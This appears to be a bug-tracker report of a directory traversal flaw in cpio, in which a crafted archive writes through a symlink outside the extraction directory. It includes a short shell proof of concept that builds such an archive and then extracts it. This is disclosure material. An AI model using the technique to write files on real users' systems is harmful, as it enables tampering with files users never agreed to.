It was reported  that cpio is susceptible to a directory traversal vulnerability.
Original report follows:
While extracting an archive, it will extract symlinks and then follow them if
they are referenced in further entries. This can be exploited by a rogue
archive to write files outside the current directory.
1) create a sample archive:
ln -s /tmp dir
echo dir | cpio -oF test.cpio
echo hello > dir/file
echo dir/file | cpio -oAF test.cpio
rm -r dir
2) test it:
cpio --no-absolute-filenames -ivF test.cpio
This will create a symlink "dir" in the current directory and a file
No patches are available at this time.
This attack requires to social engineer the user to open the cpio archive, impact of this is low.
Suse created a patch for this, attached at:
Created cpio tracking bugs for this issue:
Affects: fedora-all [bug 1188590]
*** Bug 1539685 has been marked as a duplicate of this bug. ***